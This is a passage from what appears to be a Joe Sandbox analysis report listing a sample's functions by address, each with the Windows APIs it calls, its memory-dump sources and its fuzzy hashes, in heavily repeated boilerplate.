                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                              • Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                                              • Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407A46 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00000000,00000000), ref: 00407A53
                                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00407A69
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                                              • Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040774B Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                                                                              • Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                                              • Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404316 Relevance: 2.5, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                                                              • Opcode ID: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                                              • Instruction ID: dd570ae04773ec1d9248e7accc602cb5589f5768ce779b06ba6b6fcb8a9dd89b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2F0F8B05047049AC320BF789D4841A76A8AB81329BA44B3DF5B4E62E0D73894628B6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403B31 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                              • Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                                              • Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040183B Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32 ref: 00401855
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                                                                                                                                                              • Instruction ID: 66959b0bba6a1c3021cfc6ef215295b74c1233013eb20c9b72e5f533845a5747
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33D0A7B010C201DED3006F248C0053BB6F4AF84300F20863DF0C6A31E4C334C8836B2A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 0040710B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 358windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 1085758737-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                                              • Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00405C44 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 327COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405CAA
                                                                                                                                                                                                                                                              • SetWindowTextA.USER32 ref: 00405CE6
                                                                                                                                                                                                                                                                • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
                                                                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00405FD2
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
                                                                                                                                                                                                                                                              • String ID: A$Lq
                                                                                                                                                                                                                                                              • API String ID: 2917460849-3136341169
                                                                                                                                                                                                                                                              • Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                                              • Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402988 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160comCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32 ref: 00402A22
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000), ref: 00402B6F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                              • String ID: 4A
                                                                                                                                                                                                                                                              • API String ID: 123533781-205151761
                                                                                                                                                                                                                                                              • Opcode ID: ecb612db5eae3566e926ef45e64615f90559cffa0a4e7bcadb3d1b0ad6a2cce0
                                                                                                                                                                                                                                                              • Instruction ID: d305ef95405f15bde97fa7dd711ba6fc9ffd0a80db07f91d6d56198472658b67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecb612db5eae3566e926ef45e64615f90559cffa0a4e7bcadb3d1b0ad6a2cce0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51614CB0A087119FD710EF69C9886AABBF4FF88314F008AADE58897391D7749885CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040342B Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                                              • Opcode ID: fce1d974e300f46887b22a37e71dcc213f53c6413cec510bd16856115e4e31a8
